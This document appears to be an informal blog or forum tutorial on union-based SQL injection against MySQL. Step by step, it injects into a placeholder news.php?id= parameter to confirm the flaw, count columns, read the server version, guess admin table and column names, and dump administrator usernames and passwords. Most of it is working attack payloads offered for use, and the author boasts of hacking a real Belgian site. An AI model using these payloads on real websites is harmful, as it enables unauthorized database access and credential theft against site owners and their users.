The world's most popular open source database MySQL.
I’ll make it easy and fast,simple and less theory.What Will You Read About:
*Check For Vuln.
*Check How Much Columns Are There
*Check Does Union Works
*Check For Version
*Getting table and column name &Pulling Data Out.
Okey Letz start…
We are going to use an example like this:
Code:
http://site.com/news.php?id=5
*Check For Vuln.
Checking for vuln is same as in Normal SQL Injection With a string(‘) so the url will look like this:
Code:
http://site.com/news.php?id=5'
and we will get something like
Code:
"You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right
this means that the site is vuln to MySQL Injection *Check How Much Columns Are There
Like i said like in normal MySQL INjection we do this with
So we go now to the url and try to find how many columns are there:
Code:
http://www.site.com/news.php?id=5 order by 1/* < -- no error
http://www.site.com/news.php?id=5 order by 2/* <-- no error
http://www.site.com/news.php?id=5 order by 3/* < -- no error
http://www.site.com/news.php?id=5 order by 4/* < -- error
We got some message like
Code:
Unkown Column "4" in "order clause"
This means that there are 3 columns
*Check Does Union Works
With union we can select more data in one sql statement.
Code:
http://www.site.com/news.php?id=5 union all select 1,2,3/ *
if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works
*Check For Version
So when we tryped this:
Code:
http://www.site.com/news.php?id=5 union all select 1,2,3/*
some numbers lets say 2 have showed us on the screen now we change 2 into
Code:
version() or @@version
so the url will looks like this:
Code:
http://www.si te.com/news.php?id=5 union select 1,@@version,3/*
and we get like a result something like this:
Code:
4.1.33-log or 5.0.45 or similar.
*Getting table and column nameAnd now is the real part where you learn about how to do this shit.
well if the MySQL version is < 5 (i.e 4.1.33, 4.1.12…) we need to guess the table names and column names.So this is the hard part in this injection.
-Why?
Well everysite is not on english langue i have recently hacked a site from belgium the columns and tables weren’t like
Code:
username,user,userid,password,members.admin ect
they were completly different so this makes the injector(You/Hacker) works a lot harder you need to search for that kind of words than translate them a lotz a lotz of work and maybe everything will be for nothing. That is why i hate this Injection So letz say the site have an english table names and column names .
common table names:
Code:
user,usres,admin,administrators,members,member,login
common column names:
Code:
username,useremail,n_user,user_name,user,password,pass,upass,userpassword,userpass,hash,email,umail
Now letz check if there is a table name admin we do that doing this:
Code:
http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/*
So if we see the number 2 on the screen table admin exsists if doesnt exsists probably we will get an error
so we move on we know there is a table with name admin now its time for the columns
Code:
http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/*
If we get an error column name “username” doesn’t exsists
so we try other:
Code:
http://www.site.com/news.php?id=5 union all select 1,uname,3 from admin/*
It returns an data ex:
So we guessed the column user now its time for password:
Code:
http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/*
Damn returns error there is no column name “password” lets try other:
Code:
http://www.site.com/news.php?id=5 union all select 1,upass,3 from admin/*
w00t we got:
So Now we know that there is an table name:
with columns:
and we pulled the data from them and get:
Code:
Administraotr:AdminPassword
Also we can use contact() to get everything in one request:
Code:
http://www.site.com/news.php?id=5 union all select 1,concat(uname,0x3a,upass),3 from admin/*
and we get:
Administrator:AdminPassword
Leave a comment below.